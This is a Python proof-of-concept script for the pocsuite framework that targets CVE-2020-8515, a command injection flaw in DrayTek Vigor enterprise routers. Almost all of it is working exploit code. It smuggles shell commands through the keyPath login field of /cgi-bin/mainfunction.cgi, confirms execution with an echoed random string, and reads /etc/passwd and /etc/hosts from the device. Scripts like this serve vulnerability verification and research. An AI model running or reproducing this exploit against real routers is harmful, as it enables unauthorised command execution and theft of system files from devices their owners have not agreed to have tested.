PoC.py

import urlparse

from pocsuite.api.poc import POCBase
from pocsuite.api.poc import register
from pocsuite.api.poc import Output
from pocsuite.api.request import req
from pocsuite.api.utils import randomStr


class TestPOC(POCBase):

    vulID = 'CVE-2020-8515'
    version = ''
    author = 'elloit'
    vulDate = '2020-03-30'
    createDate = '2020-03-30'
    updateDate = '2020-03-30'
    references = [
        "https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/",
        "https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices/"
    ]
    name = 'CVE-2020-8515 draytek 企业级路由器命令执行漏洞'
    appPowerLink = '"https://www.draytek.com/'
    appName = 'DrayTek Vigor'
    appVersion = '''
        '''
    vulType = '命令执行'
    desc = '''
        '''
    samples = [
       
    ]
    install_requires = ""

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        self.raw_url = self.url
        host = urlparse.urlparse(self.url).hostname
        port = urlparse.urlparse(self.url).port
        scheme = urlparse.urlparse(self.url).scheme
        if port is None:
            port = "80"
        else:
            port = str(port)
        if "https" == scheme:
            self.url = "%s://%s" % (scheme, host)
        else:
            self.url = "%s://%s:%s" % (scheme, host, port)

        try:
            flag = randomStr(10)
            check = self.run_cmd("echo${IFS}" + flag).split("\n")[0]
            if flag == check:
                result["VerifyInfo"] = {}
                result["VerifyInfo"]["url"] = self.url
                result["VerifyInfo"]["passwd"] = self.run_cmd("cat${IFS}%2fetc%2fpasswd")
                result["VerifyInfo"]["hosts"] = self.run_cmd("cat${IFS}%2fetc%2fhosts")
        except Exception as e:
            pass
        return self.parse_output(result)

    def run_cmd(self, cmd):
        try:
            headers = {
                "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0"
            }
            url = self.url + "/cgi-bin/mainfunction.cgi"
            data = "action=login&keyPath=%27%0A%2fbin%2f" + cmd + "%0A%27&loginUser=a&loginPwd=a"
            res = req.post(url=url, data=data, timeout=(10, 15), headers=headers)
            if res.status_code == 200:
                return res.text
            else:
                return ""
        except Exception as e:
            return ""

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)